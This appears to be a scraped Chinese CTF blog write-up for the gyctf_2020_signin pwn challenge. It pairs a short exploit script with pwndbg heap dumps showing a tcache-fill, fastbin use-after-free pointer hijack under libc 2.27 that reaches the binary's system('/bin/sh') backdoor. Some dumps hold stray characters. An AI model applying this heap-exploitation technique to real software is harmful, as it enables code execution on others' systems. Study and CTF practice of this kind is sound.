当前位置: 首页 > news >正文

CTF-pwn:libc2.27指针劫持[gyctf_2020_signin]

news 2024/11/5 13:41:21

libc2.27指针劫持gyctf_2020_signin

add(0)
add(1)
add(2)
add(3)
add(4)
add(5)
add(6)
add(7)delete(0)
delete(1)
delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)# fast binpush()
add(8)# tcache bin
edit(7,p64(0x4040c0-0x10))
add(9)io.sendlineafter(b'your choice?',b'6')

我们来看看这是为什么

add(0)
add(1)
add(2)
add(3)
add(4)
add(5)
add(6)
add(7)

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)Allocated chunk | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)

delete(0)

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00Allocated chunk | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)bAllocated chunk | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)iAllocated chunk | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)nAllocated chunk | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)sAllocated chunk | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)pwndbg> bins
tcachebins
0x80 [  1]: 0xb80260 ◂— 0
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty

delete(1)

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00bFree chunk (tcachebins) | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80260iAllocated chunk | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)nAllocated chunk | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)sAllocated chunk | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)Allocated chunk | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)pwndbg> bins
tcachebins
0x80 [  2]: 0xb802e0 —▸ 0xb80260 ◂— 0
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty

我们发现,第一个释放的堆的fd是空的,而第二个释放的指向了第一个的fd,以此类推

delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)# fast bin

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80260Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)
fd: 0xb802e0Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80360Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)
fd: 0xb803e0Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80460Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)
fd: 0xb804e0Free chunk (fastbins) | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)
fd: 0x00Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)pwndbg> bins
tcachebins
0x80 [  7]: 0xb80560 —▸ 0xb804e0 —▸ 0xb80460 —▸ 0xb803e0 —▸ 0xb80360 —▸ 0xb802e0 —▸ 0xb80260 ◂— 0
fastbins
0x80: 0xb805d0 ◂— 0
unsortedbin
empty
smallbins
empty
largebins
empty

add(8)

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80260bFree chunk (tcachebins) | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)
fd: 0xb802e0iFree chunk (tcachebins) | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80360nFree chunk (tcachebins) | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)
fd: 0xb803e0sFree chunk (tcachebins) | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80460Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)Free chunk (fastbins) | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)
fd: 0x00Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)pwndbg> bins
tcachebins
0x80 [  6]: 0xb804e0 —▸ 0xb80460 —▸ 0xb803e0 —▸ 0xb80360 —▸ 0xb802e0 —▸ 0xb80260 ◂— 0
fastbins
0x80: 0xb805d0 ◂— 0
unsortedbin
empty
smallbins
empty
largebins
empty

现在我们利用UAF劫持指针

edit(7,p64(0x4040c0-0x10))

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80260Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)
fd: 0xb802e0Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80360Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)
fd: 0xb803e0Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80460Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)Free chunk (fastbins) | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)
fd: 0x4040b0Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)pwndbg> bins
tcachebins
0x80 [  6]: 0xb804e0 —▸ 0xb80460 —▸ 0xb803e0 —▸ 0xb80360 —▸ 0xb802e0 —▸ 0xb80260 ◂— 0
fastbins
0x80: 0xb805d0 —▸ 0x4040b0 (stdin@@GLIBC_2.2.5) ◂— 0
unsortedbin
empty
smallbins
empty
largebins
empty
pwndbg>

void __noreturn backdoor()
{calloc(1uLL, 0x70uLL);if ( change_it )system("/bin/sh");exit(0);
}

在此版本中calloc会优先分配fastbin,calloc 将这个 chunk 分配出去时会把这个0x4040b0放入tcache,并修改其0x4040b0+0x10的fd指向上一个tcachebin堆块,


http://www.mrgr.cn/news/64834.html

相关文章:

  • 小白挖漏洞必备的两个平台!有技术就能挖,没有上限,光靠挖洞月入1w+的都大有人在!_漏洞挖掘提交网站。
  • SVN 提交操作
  • 智算中心建设热潮涌动 AI服务器赋能加速
  • 网络学习/复习4传输层
  • 深入 Prometheus 监控生态 - 第六篇:与 Grafana 实现系统全面监控(健康状态和任务状态看板)
  • C++_day3
  • 多臂老虎机——入门强化学习
  • Qt 应用开发之 MVC 架构
  • Linux入门-基础指令和权限
  • ssm044基于java和mysql的多角色学生管理系统+jsp(论文+源码)_kaic
  • 有向无环图的拓扑排序——CSP-J1真题讲解
  • 高等数学习题练习-函数的连续性
  • 支持 Mermaid 语言预览,用通义灵码画流程图
  • ERC论文阅读(04)--DialogueCRN论文阅读笔记(2024-11-03)
  • 前端学习-盒子模型(十八)
  • 【Git】如何在 Git 中高效合并分支:完整指南
  • 【学术精选】SCI期刊《Electronics》特刊“New Challenges in Remote Sensing Image Processing“
  • 手把手教你用IntelliJ IDEA 操作 DM8
  • ! [remote rejected] master -> master (pre-receive hook declined)
  • YOLOv6-4.0部分代码阅读笔记-ema.py
  • 2024年一带一路金砖技能大赛之大数据容器云开发
  • Win10 连接到 Ubuntu 黑屏无法连接 使用Rustdesk显示 No Displays 没有显示器
  • GOF的C++软件设计模式的分类和模式名称
  • 数据结构初阶排序全解
  • 力扣周赛:第422场周赛
  • roberta融合模型创新中文新闻文本标题分类